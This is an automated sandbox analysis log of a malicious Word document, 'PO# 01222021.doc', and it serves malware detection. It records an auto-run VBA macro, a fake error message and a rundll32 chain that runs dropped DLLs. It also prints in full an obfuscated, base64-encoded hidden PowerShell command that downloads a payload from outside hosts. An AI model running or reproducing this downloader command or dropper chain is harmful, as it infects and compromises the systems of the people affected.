Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A2E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E8F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001EF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006AFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CF07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003F0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013F16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018721
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019726
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001732F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D535
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014D39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003743
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001894D 7_2_1001894D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010950 7_2_10010950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011F54 7_2_10011F54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB58 7_2_1001CB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BF69 7_2_1001BF69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007B6A 7_2_10007B6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A16A 7_2_1000A16A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019D6D 7_2_10019D6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001197B 7_2_1001197B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DD80 7_2_1001DD80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10017B8D 7_2_10017B8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B598 7_2_1001B598
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001539F 7_2_1001539F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000799F 7_2_1000799F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E9A2 7_2_1001E9A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EBA4 7_2_1000EBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021C0 7_2_100021C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C1C2 7_2_1001C1C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100107D3 7_2_100107D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100095DD 7_2_100095DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D5DF 7_2_1001D5DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100129E3 7_2_100129E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F7EF 7_2_1000F7EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100033F4 7_2_100033F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A7FA 7_2_1000A7FA
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: PO# 01222021.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: PO# 01222021.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/8@1/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$# 01222021.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC2C2.tmp
Source: PO# 01222021.doc OLE indicator, Word Document stream: true
Source: PO# 01222021.doc OLE document summary: title field not present or empty
Source: PO# 01222021.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............`........................... .a.......a...............".....X.".............#...............................h.......5kU......."..... 
Source: C:\Windows\System32\msg.exe Console Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........".....L................."..... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.N..............................IP..... .........#.............}..v....x....... ............................................... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................D.j..... #...............#.............}..v............0.N...............[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................G.j......................#.............}..v............0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................G.j......[...............#.............}..v....h.......0.N.............(.[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............EG.j.....i................#.............}..v.....N......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............EG.j..... #...............#.............}..v.....N......0.N.............x.[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....M[...............#.............}..v............0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....@.................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....M[...............#.............}..v............0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....@.................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....M[...............#.............}..v............0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....@.................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.N.............HJ[.....(....................... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j......................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v.... .......0.N.............HJ[.....$....................... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................#.............}..v.... ......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j..... ................#.............}..v....X!......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... (......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....(................#.............}..v....X)......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... 0......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....0................#.............}..v....X1......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... 8......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....8................#.............}..v....X9......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... @......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....@................#.............}..v....XA......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... H......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H................#.............}..v....XI......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... P......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....P................#.............}..v....XQ......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... X......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....X................#.............}..v....XY......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... `......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....`................#.............}..v....Xa......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... h......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....h................#.............}..v....Xi......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... p......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....p................#.............}..v....Xq......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... x......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....x................#.............}..v....Xy......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j......................#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................j....................... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....P.................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v....x.......0.N............................................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................B.............................. .L...............#..............................................J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................r....................... 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....8.......0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....M[...............#.............}..v............0.N.............HJ[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............J[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................5z.j....E.h...............#.............}..v....xH......0.N...............[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................5z.j....E.h...............#.............}..v............0.N...............[............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: PO# 01222021.doc Virustotal: Detection: 66%
Source: PO# 01222021.doc Metadefender: Detection: 48%
Source: PO# 01222021.doc ReversingLabs: Detection: 67%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACw
AWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1 Jump to behavior
